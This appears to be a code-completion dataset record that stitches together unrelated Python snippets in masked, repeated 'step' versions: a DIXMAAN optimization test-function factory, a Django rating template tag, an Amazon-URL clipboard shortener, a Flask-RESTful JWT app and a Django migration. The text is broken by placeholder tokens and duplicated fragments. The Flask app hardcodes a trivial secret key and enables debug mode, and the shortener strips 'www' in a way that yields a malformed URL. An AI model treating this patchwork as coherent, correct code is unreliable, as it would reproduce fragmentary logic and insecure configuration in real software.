"step-3": "<mask token>\ntable_DIXMAAN = dict()\ntable_DIXMAAN['A'] = 1, 0, 0.125, 0.125, 0, 0, 0, 0\ntable_DIXMAAN['B'] = 1, 0.0625, 0.0625, 0.0625, 0, 0, 0, 1\ntable_DIXMAAN['C'] = 1, 0.125, 0.125, 0.125, 0, 0, 0, 0\ntable_DIXMAAN['D'] = 1, 0.26, 0.26, 0.26, 0, 0, 0, 0\ntable_DIXMAAN['E'] = 1, 0, 0.125, 0.125, 1, 0, 0, 1\ntable_DIXMAAN['F'] = 1, 0.0625, 0.0625, 0.0625, 1, 0, 0, 1\ntable_DIXMAAN['G'] = 1, 0.125, 0.125, 0.125, 1, 0, 0, 1\ntable_DIXMAAN['H'] = 1, 0.26, 0.26, 0.26, 1, 0, 0, 1\ntable_DIXMAAN['I'] = 1, 0, 0.125, 0.125, 2, 0, 0, 2\ntable_DIXMAAN['J'] = 1, 0.0625, 0.0625, 0.0625, 2, 0, 0, 2\ntable_DIXMAAN['K'] = 1, 0.125, 0.125, 0.125, 2, 0, 0, 2\ntable_DIXMAAN['L'] = 1, 0.26, 0.26, 0.26, 2, 0, 0, 2\n\n\ndef DIXMAAN(type):\n\n def DIXMAAN_(n):\n name = 'DIXMAAN%c function (CUTE)' % type\n alpha, beta, gamma, sigma, k1, k2, k3, k4 = table_DIXMAAN[type]\n m = n // 3\n sm = lambda i: alpha * xi(i) ** 2 * (i / n) ** k1\n sm2 = lambda i: beta * xi(i) ** 2 * (xi(i + 1) + xi(i + 1) ** 2) * (i /\n n) ** k2\n sm3 = lambda i: gamma * xi(i) ** 2 * xi(i + m) ** 4 * (i / n) ** k3\n sm4 = lambda i: sigma * xi(i) * xi(i + 2 * m) * (i / n) ** k4\n f_1 = lambda : sum([sm2(i) for i in range(1, n)])\n f_2 = lambda : sum([sm3(i) for i in range(1, 2 * m + 1)])\n f_3 = lambda : sum([sm4(i) for i in range(1, m + 1)])\n f = lambda : 1 + f_1() + f_2() + f_3()\n x0 = np.ones((n, 1)) * 2.0\n return create_test_function(name, n, sm, x0, first=f, range_func=\n default_range_1)\n DIXMAAN_.__name__ += type\n return DIXMAAN_\n",
"step-4": "from .test_function import *\nfrom .support_funcs import *\ntable_DIXMAAN = dict()\ntable_DIXMAAN['A'] = 1, 0, 0.125, 0.125, 0, 0, 0, 0\ntable_DIXMAAN['B'] = 1, 0.0625, 0.0625, 0.0625, 0, 0, 0, 1\ntable_DIXMAAN['C'] = 1, 0.125, 0.125, 0.125, 0, 0, 0, 0\ntable_DIXMAAN['D'] = 1, 0.26, 0.26, 0.26, 0, 0, 0, 0\ntable_DIXMAAN['E'] = 1, 0, 0.125, 0.125, 1, 0, 0, 1\ntable_DIXMAAN['F'] = 1, 0.0625, 0.0625, 0.0625, 1, 0, 0, 1\ntable_DIXMAAN['G'] = 1, 0.125, 0.125, 0.125, 1, 0, 0, 1\ntable_DIXMAAN['H'] = 1, 0.26, 0.26, 0.26, 1, 0, 0, 1\ntable_DIXMAAN['I'] = 1, 0, 0.125, 0.125, 2, 0, 0, 2\ntable_DIXMAAN['J'] = 1, 0.0625, 0.0625, 0.0625, 2, 0, 0, 2\ntable_DIXMAAN['K'] = 1, 0.125, 0.125, 0.125, 2, 0, 0, 2\ntable_DIXMAAN['L'] = 1, 0.26, 0.26, 0.26, 2, 0, 0, 2\n\n\ndef DIXMAAN(type):\n\n def DIXMAAN_(n):\n name = 'DIXMAAN%c function (CUTE)' % type\n alpha, beta, gamma, sigma, k1, k2, k3, k4 = table_DIXMAAN[type]\n m = n // 3\n sm = lambda i: alpha * xi(i) ** 2 * (i / n) ** k1\n sm2 = lambda i: beta * xi(i) ** 2 * (xi(i + 1) + xi(i + 1) ** 2) * (i /\n n) ** k2\n sm3 = lambda i: gamma * xi(i) ** 2 * xi(i + m) ** 4 * (i / n) ** k3\n sm4 = lambda i: sigma * xi(i) * xi(i + 2 * m) * (i / n) ** k4\n f_1 = lambda : sum([sm2(i) for i in range(1, n)])\n f_2 = lambda : sum([sm3(i) for i in range(1, 2 * m + 1)])\n f_3 = lambda : sum([sm4(i) for i in range(1, m + 1)])\n f = lambda : 1 + f_1() + f_2() + f_3()\n x0 = np.ones((n, 1)) * 2.0\n return create_test_function(name, n, sm, x0, first=f, range_func=\n default_range_1)\n DIXMAAN_.__name__ += type\n return DIXMAAN_\n",
"step-5": "from .test_function import *\nfrom .support_funcs import *\n\ntable_DIXMAAN = dict()\ntable_DIXMAAN['A'] = (1, 0, 0.125, 0.125, 0, 0, 0, 0)\ntable_DIXMAAN['B'] = (1, 0.0625, 0.0625, 0.0625, 0, 0, 0, 1)\ntable_DIXMAAN['C'] = (1, 0.125, 0.125, 0.125, 0, 0, 0, 0)\ntable_DIXMAAN['D'] = (1, 0.26, 0.26, 0.26, 0, 0, 0, 0)\ntable_DIXMAAN['E'] = (1, 0, 0.125, 0.125, 1, 0, 0, 1)\ntable_DIXMAAN['F'] = (1, 0.0625, 0.0625, 0.0625, 1, 0, 0, 1)\ntable_DIXMAAN['G'] = (1, 0.125, 0.125, 0.125, 1, 0, 0, 1)\ntable_DIXMAAN['H'] = (1, 0.26, 0.26, 0.26, 1, 0, 0, 1)\ntable_DIXMAAN['I'] = (1, 0, 0.125, 0.125, 2, 0, 0, 2)\ntable_DIXMAAN['J'] = (1, 0.0625, 0.0625, 0.0625, 2, 0, 0, 2)\ntable_DIXMAAN['K'] = (1, 0.125, 0.125, 0.125, 2, 0, 0, 2)\ntable_DIXMAAN['L'] = (1, 0.26, 0.26, 0.26, 2, 0, 0, 2)\n\n\ndef DIXMAAN(type):\n def DIXMAAN_(n):\n name = \"DIXMAAN%c function (CUTE)\" % type\n alpha, beta, gamma, sigma, k1, k2, k3, k4 = table_DIXMAAN[type]\n m = n // 3\n sm = lambda i: alpha * xi(i) ** 2 *(i / n) ** k1\n sm2 = lambda i: beta * xi(i) ** 2 * (xi(i+1) + xi(i+1)**2) * (i / n) ** k2\n sm3 = lambda i: gamma * xi(i)**2 * xi(i+m) ** 4 * (i / n) ** k3\n sm4 = lambda i: sigma * xi(i) * xi(i+2*m) * (i / n) ** k4\n f_1 = lambda: sum([sm2(i) for i in range(1, n)])\n f_2 = lambda: sum([sm3(i) for i in range(1, 2 * m + 1)])\n f_3 = lambda: sum([sm4(i) for i in range(1, m + 1)])\n f = lambda: 1 + f_1() + f_2() + f_3()\n x0 = np.ones((n, 1)) * 2.0\n return create_test_function(name, n, sm, x0, first=f, range_func=default_range_1)\n DIXMAAN_.__name__ += type\n return DIXMAAN_",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
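How the DIXMAAN factory above is consumed: DIXMAAN('A') picks a parameter row from table_DIXMAAN and returns a generator renamed DIXMAAN_A, and calling that with a dimension n (ideally a multiple of 3, since m = n // 3) builds the problem at x0 = 2.0 * ones((n, 1)). What create_test_function returns is package-specific, so the sketch stops there:

DIXMAANA = DIXMAAN('A')     # selects (alpha, beta, gamma, sigma, k1..k4) for 'A'
print(DIXMAANA.__name__)    # -> DIXMAAN_A
problem = DIXMAANA(9)       # n = 9, so m = 3; wraps create_test_function(...)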
<|reserved_special_token_0|>
class RatingBlock(InclusionTag):
name = 'rating'
template = 'ratings/rating.html'
options = Options(Argument('obj', required=True))
def get_context(self, context, obj):
if not hasattr(obj, '_meta') or not hasattr(obj, 'pk'):
raise ValueError(
                'Expected an instance of django.models.Model, but got %s.' %
type(obj))
can_vote = True
if 'user' in context and getattr(obj, 'permissions', None
) and isinstance(obj.permissions, Permissions) and hasattr(obj.
permissions, 'can_vote'):
can_vote = obj.permissions.can_vote(context['user'])
return {'content_type': str(obj._meta), 'obj_pk': obj.pk,
'can_vote': can_vote, 'score': RatedItem.objects.score_for_obj(obj)
}
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RatingBlock(InclusionTag):
name = 'rating'
template = 'ratings/rating.html'
options = Options(Argument('obj', required=True))
def get_context(self, context, obj):
if not hasattr(obj, '_meta') or not hasattr(obj, 'pk'):
raise ValueError(
                'Expected an instance of django.models.Model, but got %s.' %
type(obj))
can_vote = True
if 'user' in context and getattr(obj, 'permissions', None
) and isinstance(obj.permissions, Permissions) and hasattr(obj.
permissions, 'can_vote'):
can_vote = obj.permissions.can_vote(context['user'])
return {'content_type': str(obj._meta), 'obj_pk': obj.pk,
'can_vote': can_vote, 'score': RatedItem.objects.score_for_obj(obj)
}
<|reserved_special_token_0|>
register.tag(RatingBlock)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RatingBlock(InclusionTag):
name = 'rating'
template = 'ratings/rating.html'
options = Options(Argument('obj', required=True))
def get_context(self, context, obj):
if not hasattr(obj, '_meta') or not hasattr(obj, 'pk'):
raise ValueError(
                'Expected an instance of django.models.Model, but got %s.' %
type(obj))
can_vote = True
if 'user' in context and getattr(obj, 'permissions', None
) and isinstance(obj.permissions, Permissions) and hasattr(obj.
permissions, 'can_vote'):
can_vote = obj.permissions.can_vote(context['user'])
return {'content_type': str(obj._meta), 'obj_pk': obj.pk,
'can_vote': can_vote, 'score': RatedItem.objects.score_for_obj(obj)
}
register = template.Library()
register.tag(RatingBlock)
<|reserved_special_token_1|>
from django import template
from classytags.helpers import InclusionTag
from classytags.core import Tag, Options
from classytags.arguments import Argument
from ratings.models import RatedItem
from blogs.permissions import Permissions
class RatingBlock(InclusionTag):
name = 'rating'
template = 'ratings/rating.html'
options = Options(Argument('obj', required=True))
def get_context(self, context, obj):
if not hasattr(obj, '_meta') or not hasattr(obj, 'pk'):
raise ValueError(
                'Expected an instance of django.models.Model, but got %s.' %
type(obj))
can_vote = True
if 'user' in context and getattr(obj, 'permissions', None
) and isinstance(obj.permissions, Permissions) and hasattr(obj.
permissions, 'can_vote'):
can_vote = obj.permissions.can_vote(context['user'])
return {'content_type': str(obj._meta), 'obj_pk': obj.pk,
'can_vote': can_vote, 'score': RatedItem.objects.score_for_obj(obj)
}
register = template.Library()
register.tag(RatingBlock)
<|reserved_special_token_1|>
#coding=utf-8
from django import template
from classytags.helpers import InclusionTag
from classytags.core import Tag, Options
from classytags.arguments import Argument
from ratings.models import RatedItem
from blogs.permissions import Permissions
class RatingBlock(InclusionTag):
name = 'rating'
template = 'ratings/rating.html'
options = Options(
Argument('obj', required=True),
)
def get_context(self, context, obj):
if not hasattr(obj, '_meta') or not hasattr(obj, 'pk'):
raise ValueError("Ожидался экземпляр django.models.Model, а получили %s." % type(obj))
can_vote = True
if 'user' in context and\
getattr(obj, 'permissions', None) and\
isinstance(obj.permissions, Permissions) and\
hasattr(obj.permissions, 'can_vote'):
can_vote = obj.permissions.can_vote(context['user'])
return {
'content_type': str(obj._meta),
'obj_pk': obj.pk,
'can_vote': can_vote,
'score': RatedItem.objects.score_for_obj(obj),
}
register = template.Library()
register.tag(RatingBlock)
|
flexible
|
{
"blob_id": "1a05817c4c16f2d9234e504b0c98f9c9ae2dc3f7",
"index": 1525,
"step-1": "<mask token>\n\n\nclass RatingBlock(InclusionTag):\n name = 'rating'\n template = 'ratings/rating.html'\n options = Options(Argument('obj', required=True))\n\n def get_context(self, context, obj):\n if not hasattr(obj, '_meta') or not hasattr(obj, 'pk'):\n raise ValueError(\n 'Ожидался экземпляр django.models.Model, а получили %s.' %\n type(obj))\n can_vote = True\n if 'user' in context and getattr(obj, 'permissions', None\n ) and isinstance(obj.permissions, Permissions) and hasattr(obj.\n permissions, 'can_vote'):\n can_vote = obj.permissions.can_vote(context['user'])\n return {'content_type': str(obj._meta), 'obj_pk': obj.pk,\n 'can_vote': can_vote, 'score': RatedItem.objects.score_for_obj(obj)\n }\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass RatingBlock(InclusionTag):\n name = 'rating'\n template = 'ratings/rating.html'\n options = Options(Argument('obj', required=True))\n\n def get_context(self, context, obj):\n if not hasattr(obj, '_meta') or not hasattr(obj, 'pk'):\n raise ValueError(\n 'Ожидался экземпляр django.models.Model, а получили %s.' %\n type(obj))\n can_vote = True\n if 'user' in context and getattr(obj, 'permissions', None\n ) and isinstance(obj.permissions, Permissions) and hasattr(obj.\n permissions, 'can_vote'):\n can_vote = obj.permissions.can_vote(context['user'])\n return {'content_type': str(obj._meta), 'obj_pk': obj.pk,\n 'can_vote': can_vote, 'score': RatedItem.objects.score_for_obj(obj)\n }\n\n\n<mask token>\nregister.tag(RatingBlock)\n",
"step-3": "<mask token>\n\n\nclass RatingBlock(InclusionTag):\n name = 'rating'\n template = 'ratings/rating.html'\n options = Options(Argument('obj', required=True))\n\n def get_context(self, context, obj):\n if not hasattr(obj, '_meta') or not hasattr(obj, 'pk'):\n raise ValueError(\n 'Ожидался экземпляр django.models.Model, а получили %s.' %\n type(obj))\n can_vote = True\n if 'user' in context and getattr(obj, 'permissions', None\n ) and isinstance(obj.permissions, Permissions) and hasattr(obj.\n permissions, 'can_vote'):\n can_vote = obj.permissions.can_vote(context['user'])\n return {'content_type': str(obj._meta), 'obj_pk': obj.pk,\n 'can_vote': can_vote, 'score': RatedItem.objects.score_for_obj(obj)\n }\n\n\nregister = template.Library()\nregister.tag(RatingBlock)\n",
"step-4": "from django import template\nfrom classytags.helpers import InclusionTag\nfrom classytags.core import Tag, Options\nfrom classytags.arguments import Argument\nfrom ratings.models import RatedItem\nfrom blogs.permissions import Permissions\n\n\nclass RatingBlock(InclusionTag):\n name = 'rating'\n template = 'ratings/rating.html'\n options = Options(Argument('obj', required=True))\n\n def get_context(self, context, obj):\n if not hasattr(obj, '_meta') or not hasattr(obj, 'pk'):\n raise ValueError(\n 'Ожидался экземпляр django.models.Model, а получили %s.' %\n type(obj))\n can_vote = True\n if 'user' in context and getattr(obj, 'permissions', None\n ) and isinstance(obj.permissions, Permissions) and hasattr(obj.\n permissions, 'can_vote'):\n can_vote = obj.permissions.can_vote(context['user'])\n return {'content_type': str(obj._meta), 'obj_pk': obj.pk,\n 'can_vote': can_vote, 'score': RatedItem.objects.score_for_obj(obj)\n }\n\n\nregister = template.Library()\nregister.tag(RatingBlock)\n",
"step-5": "#coding=utf-8\nfrom django import template\n\nfrom classytags.helpers import InclusionTag\nfrom classytags.core import Tag, Options\nfrom classytags.arguments import Argument\n\nfrom ratings.models import RatedItem\nfrom blogs.permissions import Permissions\n\nclass RatingBlock(InclusionTag):\n name = 'rating'\n template = 'ratings/rating.html'\n\n options = Options(\n Argument('obj', required=True),\n )\n\n def get_context(self, context, obj):\n if not hasattr(obj, '_meta') or not hasattr(obj, 'pk'):\n raise ValueError(\"Ожидался экземпляр django.models.Model, а получили %s.\" % type(obj))\n can_vote = True\n if 'user' in context and\\\n getattr(obj, 'permissions', None) and\\\n isinstance(obj.permissions, Permissions) and\\\n hasattr(obj.permissions, 'can_vote'):\n can_vote = obj.permissions.can_vote(context['user'])\n\n\n return {\n 'content_type': str(obj._meta),\n 'obj_pk': obj.pk,\n 'can_vote': can_vote,\n 'score': RatedItem.objects.score_for_obj(obj),\n }\n\n\nregister = template.Library()\nregister.tag(RatingBlock)",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def urlShortner():
if clip.paste():
text = clip.paste()
o = urlparse(text)
if not (o.scheme == 'http' or o.scheme == 'https'):
print('This is not url.')
return 1
newUrl = 'https://www.amazon.co.jp'
urlLen = len(text)
matchObj = re.search('https://www.amazon.co.jp', text)
matchObjDp = re.search('/dp/', text)
matchObjRef = re.search('/ref', text)
""""
if matchObjRef:
        print (matchObjDp.start()) # start position of the matched string: 3
print(type(matchObj.start()))
print(type(matchObj.end()))
"""
if matchObjDp and matchObjRef:
i: int = matchObjDp.start()
while i < matchObjRef.start():
newUrl = newUrl + text[i]
i = i + 1
            shortUrl = newUrl.replace('www.', '')
print('shortUrl:' + shortUrl)
clip.copy(shortUrl)
else:
print(
'This url is not an introduction page of books on the amazon website.'
)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def urlShortner():
if clip.paste():
text = clip.paste()
o = urlparse(text)
if not (o.scheme == 'http' or o.scheme == 'https'):
print('This is not url.')
return 1
newUrl = 'https://www.amazon.co.jp'
urlLen = len(text)
matchObj = re.search('https://www.amazon.co.jp', text)
matchObjDp = re.search('/dp/', text)
matchObjRef = re.search('/ref', text)
""""
if matchObjRef:
        print (matchObjDp.start()) # start position of the matched string: 3
print(type(matchObj.start()))
print(type(matchObj.end()))
"""
if matchObjDp and matchObjRef:
i: int = matchObjDp.start()
while i < matchObjRef.start():
newUrl = newUrl + text[i]
i = i + 1
            shortUrl = newUrl.replace('www.', '')
print('shortUrl:' + shortUrl)
clip.copy(shortUrl)
else:
print(
'This url is not an introduction page of books on the amazon website.'
)
urlShortner()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import re
import pyperclip as clip
from urllib.parse import urlparse
def urlShortner():
if clip.paste():
text = clip.paste()
o = urlparse(text)
if not (o.scheme == 'http' or o.scheme == 'https'):
print('This is not url.')
return 1
newUrl = 'https://www.amazon.co.jp'
urlLen = len(text)
matchObj = re.search('https://www.amazon.co.jp', text)
matchObjDp = re.search('/dp/', text)
matchObjRef = re.search('/ref', text)
""""
if matchObjRef:
        print (matchObjDp.start()) # start position of the matched string: 3
print(type(matchObj.start()))
print(type(matchObj.end()))
"""
if matchObjDp and matchObjRef:
i: int = matchObjDp.start()
while i < matchObjRef.start():
newUrl = newUrl + text[i]
i = i + 1
            shortUrl = newUrl.replace('www.', '')
print('shortUrl:' + shortUrl)
clip.copy(shortUrl)
else:
print(
'This url is not an introduction page of books on the amazon website.'
)
urlShortner()
<|reserved_special_token_1|>
"""
Strip the unneeded parts from an amazon URL on the clipboard
"""
# -*- coding: utf-8 -*-
import re
import pyperclip as clip
from urllib.parse import urlparse
#print(clip.paste())
def urlShortner():
# text = "https://www.amazon.co.jp/Jupyter-Cookbook-Dan-Toomey/dp/1788839447/ref=sr_1_5?s=books&ie=UTF8&qid=1535164277&sr=1-5&keywords=Jupyter"
if clip.paste():
text = clip.paste()
o = urlparse(text)
# print(o.scheme)
if not (o.scheme == 'http' or o.scheme == 'https') :
print("This is not url.")
return 1
newUrl = "https://www.amazon.co.jp"
urlLen = len(text)
#print(urlLen)
matchObj = re.search(r'https://www.amazon.co.jp', text)
matchObjDp = re.search(r'/dp/', text)
matchObjRef = re.search(r'/ref', text)
""""
if matchObjRef:
    print (matchObjDp.start()) # start position of the matched string: 3
print(type(matchObj.start()))
print(type(matchObj.end()))
"""
if matchObjDp and matchObjRef:
i:int = matchObjDp.start()
#print("2ndStart:" + str(i) )
while i < matchObjRef.start():
newUrl = newUrl + text[i]
i= i+1
shortUrl = newUrl.replace("www","")
print ("shortUrl:" + shortUrl)
clip.copy(shortUrl)
else:
print ("This url is not an introduction page of books on the amazon website.")
urlShortner()
|
flexible
|
{
"blob_id": "c3c82b9ba198b7818cc8e63710140bbb6e28a9ea",
"index": 6628,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef urlShortner():\n if clip.paste():\n text = clip.paste()\n o = urlparse(text)\n if not (o.scheme == 'http' or o.scheme == 'https'):\n print('This is not url.')\n return 1\n newUrl = 'https://www.amazon.co.jp'\n urlLen = len(text)\n matchObj = re.search('https://www.amazon.co.jp', text)\n matchObjDp = re.search('/dp/', text)\n matchObjRef = re.search('/ref', text)\n \"\"\"\"\n if matchObjRef:\n print (matchObjDp.start()) # マッチした文字列の開始位置: 3\n\n print(type(matchObj.start()))\n print(type(matchObj.end()))\n\n \"\"\"\n if matchObjDp and matchObjRef:\n i: int = matchObjDp.start()\n while i < matchObjRef.start():\n newUrl = newUrl + text[i]\n i = i + 1\n shortUrl = newUrl.replace('www', '')\n print('shortUrl:' + shortUrl)\n clip.copy(shortUrl)\n else:\n print(\n 'This url is not an introduction page of books on the amazon website.'\n )\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef urlShortner():\n if clip.paste():\n text = clip.paste()\n o = urlparse(text)\n if not (o.scheme == 'http' or o.scheme == 'https'):\n print('This is not url.')\n return 1\n newUrl = 'https://www.amazon.co.jp'\n urlLen = len(text)\n matchObj = re.search('https://www.amazon.co.jp', text)\n matchObjDp = re.search('/dp/', text)\n matchObjRef = re.search('/ref', text)\n \"\"\"\"\n if matchObjRef:\n print (matchObjDp.start()) # マッチした文字列の開始位置: 3\n\n print(type(matchObj.start()))\n print(type(matchObj.end()))\n\n \"\"\"\n if matchObjDp and matchObjRef:\n i: int = matchObjDp.start()\n while i < matchObjRef.start():\n newUrl = newUrl + text[i]\n i = i + 1\n shortUrl = newUrl.replace('www', '')\n print('shortUrl:' + shortUrl)\n clip.copy(shortUrl)\n else:\n print(\n 'This url is not an introduction page of books on the amazon website.'\n )\n\n\nurlShortner()\n",
"step-4": "<mask token>\nimport re\nimport pyperclip as clip\nfrom urllib.parse import urlparse\n\n\ndef urlShortner():\n if clip.paste():\n text = clip.paste()\n o = urlparse(text)\n if not (o.scheme == 'http' or o.scheme == 'https'):\n print('This is not url.')\n return 1\n newUrl = 'https://www.amazon.co.jp'\n urlLen = len(text)\n matchObj = re.search('https://www.amazon.co.jp', text)\n matchObjDp = re.search('/dp/', text)\n matchObjRef = re.search('/ref', text)\n \"\"\"\"\n if matchObjRef:\n print (matchObjDp.start()) # マッチした文字列の開始位置: 3\n\n print(type(matchObj.start()))\n print(type(matchObj.end()))\n\n \"\"\"\n if matchObjDp and matchObjRef:\n i: int = matchObjDp.start()\n while i < matchObjRef.start():\n newUrl = newUrl + text[i]\n i = i + 1\n shortUrl = newUrl.replace('www', '')\n print('shortUrl:' + shortUrl)\n clip.copy(shortUrl)\n else:\n print(\n 'This url is not an introduction page of books on the amazon website.'\n )\n\n\nurlShortner()\n",
"step-5": "\n\"\"\"\nクリップボードのamazonのURLから不要な部分を削除する\n\"\"\"\n# -*- coding: utf-8 -*-\n\nimport re\nimport pyperclip as clip\nfrom urllib.parse import urlparse\n\n#print(clip.paste())\n\ndef urlShortner():\n# text = \"https://www.amazon.co.jp/Jupyter-Cookbook-Dan-Toomey/dp/1788839447/ref=sr_1_5?s=books&ie=UTF8&qid=1535164277&sr=1-5&keywords=Jupyter\"\n\n if clip.paste():\n text = clip.paste()\n o = urlparse(text)\n# print(o.scheme)\n\n if not (o.scheme == 'http' or o.scheme == 'https') :\n print(\"This is not url.\")\n return 1\n\n newUrl = \"https://www.amazon.co.jp\"\n\n urlLen = len(text)\n #print(urlLen)\n\n matchObj = re.search(r'https://www.amazon.co.jp', text)\n matchObjDp = re.search(r'/dp/', text)\n matchObjRef = re.search(r'/ref', text)\n\n \"\"\"\"\n if matchObjRef:\n print (matchObjDp.start()) # マッチした文字列の開始位置: 3\n\n print(type(matchObj.start()))\n print(type(matchObj.end()))\n\n \"\"\"\n\n if matchObjDp and matchObjRef:\n i:int = matchObjDp.start()\n #print(\"2ndStart:\" + str(i) )\n while i < matchObjRef.start():\n newUrl = newUrl + text[i]\n i= i+1\n\n shortUrl = newUrl.replace(\"www\",\"\")\n\n print (\"shortUrl:\" + shortUrl)\n\n clip.copy(shortUrl)\n\n else:\n print (\"This url is not an introduction page of books on the amazon website.\")\n\n\nurlShortner()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
api.add_resource(StoreList, '/stores')
api.add_resource(Store, '/store/<string:name>')
api.add_resource(ItemList, '/items')
api.add_resource(Item, '/item/<string:name>')
api.add_resource(UserRegister, '/register')
if __name__ == '__main__':
from db import db
db.init_app(app)
app.run(port=5000, debug=True)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL',
'sqlite:///data.db')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.secret_key = 'naveen'
api = Api(app)
jwt = JWT(app, authenticate, identity)
api.add_resource(StoreList, '/stores')
api.add_resource(Store, '/store/<string:name>')
api.add_resource(ItemList, '/items')
api.add_resource(Item, '/item/<string:name>')
api.add_resource(UserRegister, '/register')
if __name__ == '__main__':
from db import db
db.init_app(app)
app.run(port=5000, debug=True)
<|reserved_special_token_1|>
import os
from flask import Flask, request
from flask_restful import Resource, Api, reqparse
from flask_jwt import JWT, jwt_required
from resources.Users import UserRegister
from security import authenticate, identity
from resources.items import Item, ItemList
from resources.stores import Store, StoreList
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL',
'sqlite:///data.db')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.secret_key = 'naveen'
api = Api(app)
jwt = JWT(app, authenticate, identity)
api.add_resource(StoreList, '/stores')
api.add_resource(Store, '/store/<string:name>')
api.add_resource(ItemList, '/items')
api.add_resource(Item, '/item/<string:name>')
api.add_resource(UserRegister, '/register')
if __name__ == '__main__':
from db import db
db.init_app(app)
app.run(port=5000, debug=True)
<|reserved_special_token_1|>
import os
from flask import Flask,request
from flask_restful import Resource,Api,reqparse
from flask_jwt import JWT,jwt_required
from resources.Users import UserRegister
from security import authenticate,identity
from resources.items import Item, ItemList
from resources.stores import Store, StoreList
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL','sqlite:///data.db')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.secret_key = 'naveen'
api = Api(app)
jwt = JWT(app,authenticate,identity)
api.add_resource(StoreList,"/stores")
api.add_resource(Store,"/store/<string:name>")
api.add_resource(ItemList,"/items")
api.add_resource(Item,"/item/<string:name>")
api.add_resource(UserRegister,"/register")
if __name__ =="__main__":
from db import db
db.init_app(app)
app.run(port=5000,debug=True)
|
flexible
|
{
"blob_id": "bf8f7b51b685f0e9131cb4d8a0bfc16ee5ad1263",
"index": 3281,
"step-1": "<mask token>\n",
"step-2": "<mask token>\napi.add_resource(StoreList, '/stores')\napi.add_resource(Store, '/store/<string:name>')\napi.add_resource(ItemList, '/items')\napi.add_resource(Item, '/item/<string:name>')\napi.add_resource(UserRegister, '/register')\nif __name__ == '__main__':\n from db import db\n db.init_app(app)\n app.run(port=5000, debug=True)\n",
"step-3": "<mask token>\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL',\n 'sqlite:///data.db')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.secret_key = 'naveen'\napi = Api(app)\njwt = JWT(app, authenticate, identity)\napi.add_resource(StoreList, '/stores')\napi.add_resource(Store, '/store/<string:name>')\napi.add_resource(ItemList, '/items')\napi.add_resource(Item, '/item/<string:name>')\napi.add_resource(UserRegister, '/register')\nif __name__ == '__main__':\n from db import db\n db.init_app(app)\n app.run(port=5000, debug=True)\n",
"step-4": "import os\nfrom flask import Flask, request\nfrom flask_restful import Resource, Api, reqparse\nfrom flask_jwt import JWT, jwt_required\nfrom resources.Users import UserRegister\nfrom security import authenticate, identity\nfrom resources.items import Item, ItemList\nfrom resources.stores import Store, StoreList\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL',\n 'sqlite:///data.db')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.secret_key = 'naveen'\napi = Api(app)\njwt = JWT(app, authenticate, identity)\napi.add_resource(StoreList, '/stores')\napi.add_resource(Store, '/store/<string:name>')\napi.add_resource(ItemList, '/items')\napi.add_resource(Item, '/item/<string:name>')\napi.add_resource(UserRegister, '/register')\nif __name__ == '__main__':\n from db import db\n db.init_app(app)\n app.run(port=5000, debug=True)\n",
"step-5": "import os\nfrom flask import Flask,request\nfrom flask_restful import Resource,Api,reqparse\nfrom flask_jwt import JWT,jwt_required\nfrom resources.Users import UserRegister\nfrom security import authenticate,identity\nfrom resources.items import Item, ItemList\nfrom resources.stores import Store, StoreList\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL','sqlite:///data.db')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.secret_key = 'naveen'\napi = Api(app)\n\n\n\njwt = JWT(app,authenticate,identity)\n\n\n\napi.add_resource(StoreList,\"/stores\")\napi.add_resource(Store,\"/store/<string:name>\")\napi.add_resource(ItemList,\"/items\")\napi.add_resource(Item,\"/item/<string:name>\")\napi.add_resource(UserRegister,\"/register\")\n\nif __name__ ==\"__main__\":\n from db import db\n db.init_app(app)\n app.run(port=5000,debug=True) ",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [migrations.CreateModel(name='Kategori', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('nama_kategori', models.CharField(
max_length=30)), ('deskripsi', models.CharField(max_length=100))]),
migrations.CreateModel(name='Stone', fields=[('id', models.
AutoField(auto_created=True, primary_key=True, serialize=False,
verbose_name='ID')), ('kode', models.CharField(max_length=30)), (
'deskripsi', models.CharField(max_length=200)), ('cover_stone',
models.ImageField(upload_to='\\images')), ('kategori', models.
ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=
'stones.Kategori'))])]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
